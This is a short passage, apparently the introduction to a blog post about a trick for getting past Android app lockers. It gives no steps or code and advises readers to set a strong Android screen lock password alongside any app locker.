This technique has been sitting right under your nose for so long. This is not a vulnerability in Android or the App locker. This is just a trick to show you that you must not completely rely on App Lockers and should set a strong password for your Android Screen Lock as well.